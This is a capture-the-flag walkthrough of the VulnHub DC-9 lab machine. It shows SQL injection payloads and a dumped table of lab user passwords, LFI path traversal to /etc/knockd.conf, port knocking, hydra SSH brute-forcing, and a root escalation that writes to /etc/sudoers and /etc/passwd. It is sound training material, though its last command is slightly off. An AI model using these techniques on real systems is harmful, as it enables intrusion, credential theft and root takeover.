Vulnhub DC-9412

Penetration Test
,

Difficulty: Easy
Virtual Machine Address:
https://www.vulnhub.com/entry/dc-9,412/

Target

root privilege

Access Application

nmap -Pn 10.0.2.4

In the search.php , we can search something in it.

In display.php we can found the infomation in the application.

We can use sqlmap to discover more sentive infomation.

Boolean-based blind and time-based blind

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=Moe' AND 4391=4391 AND 'tkRy'='tkRy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=Moe' AND (SELECT 7894 FROM (SELECT(SLEEP(5)))QUdw) AND 'qgGb'='qgGb
---

sqlmap -r 1 -D users -T UserDetails --columns --dump

We can get the usernames and passwords

+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

We can found the website admin information

Decode the md5 hash
https://www.md5online.org/md5-decrypt.html
Found : transorbital1
(hash = 856f5de590ef37314e7c3bdf6f8a66dc)

After we login the admin account, threre is a rabit hole add record

Add Record ( Rabit Hole )

If we input the php command in the blank whatever Firstname, Lastname, etc. . When the web apalication will get the information including mailcious code getshell or leaking sensitive info
the html will load the php command. That’s my thought, but it failed.

File does not exist
You will be attracted by the hint first time. But how we can use this hint to expand our attack surface?
We get this error in the footer section stating File does not exist this gave me a hint about usage of include() in PHP which might be exploitable for LFI.

After looking around I found out that there was knockd.conf present meaning we can read that using LFI and then use those credentials to login via SSH.

If we visit IP /manage.php?file=../../../../../../../../etc/knockd.conf we can see the content of the knockd.conf and the sequence to open SSH is 7469,8475,9842

How we knock the SSH door?
Here is the article for ssh knocking.
https://www.tecmint.com/port-knocking-to-secure-ssh/
There are 2 commands to open the ssh door.

knock -v 10.0.2.4 7469 8475 9842
for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 10.0.2.4; done

When we open the door, do I get the user or password already? The answer is yes ! We get the information when we use sqlmap to get admin password.

The password file might be not the same as we got.
Actually when we login in as janitor, we can find the secret password file in the hidden directory.

We can try any possibilities to crack the ssh door.

hydra -L user.txt -P password.txt ssh://10.0.2.4

Get shell

when we login as fredf, we will find the way to escalate the privilege.

## sudo -l
User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
    (ALL : ALL) ALL

After we run the /opt/devstuff/dist/test/test

Usage: python test.py read append

The binary software is append the file. So we can append /etc/sudoers or /etc/passwd

echo -en "fredf ALL=(ALL:ALL) ALL" > payload.txt
sudo /opt/devstuff/dist/test/test payload.txt /etc/sudoers
openssl passwd -1 -salt l3vi4th4n 123456
[output] $1$l3vi4th4$IFdDftj0TAc1LLxP5OlsF0

echo "l3vi4th4n:$1$l3vi4th4$IFdDftj0TAc1LLxP5OlsF0:0:0:root:/root:/bin/bash" > payload1.txt
sudo /opt/devstuff/dist/test/test payload.txt /etc/passwd

And we finally get the root flag :-)